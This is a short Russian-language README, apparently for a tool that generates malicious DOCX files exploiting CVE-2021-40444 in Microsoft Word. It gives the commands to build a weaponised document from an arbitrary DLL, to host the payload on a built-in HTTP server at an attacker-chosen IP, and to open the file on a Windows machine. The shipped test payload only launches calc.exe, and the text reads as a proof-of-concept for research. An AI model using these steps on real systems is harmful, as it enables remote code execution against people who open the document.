
Генерирует вредоносные DOCX-документы, использующие CVE-2021-40444 (удалённое выполнение кода в Microsoft Office Word), со встроенным HTTP-сервером для доставки полезной нагрузки и выполнения калькулятора на основе DLL.
Генератор вредоносных docx-файлов для эксплуатации CVE-2021-40444 (удаленное выполнение кода в Microsoft Office Word)
Создание этого скрипта основано на реверс-инжиниринге образца, использовавшегося в реальных атаках: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx-файл)
Сначала необходимо установить lcab (sudo apt-get install lcab)
Ручные шаги воспроизведения описаны в REPRODUCE.md
Если сгенерированный cab-файл не работает, попробуйте указать URL exploit.html на calc.cab
Сначала сгенерируйте вредоносный docx-документ на основе DLL. Можно использовать файл test/calc.dll, который просто запускает calc.exe через вызов system()
python3 exploit.py generate test/calc.dll http://<IP СЕРВЕРА>

После генерации вредоносного docx (будет в out/) можно настроить сервер:
sudo python3 exploit.py host 80

Наконец, попробуйте открыть docx на виртуальной машине с Windows:
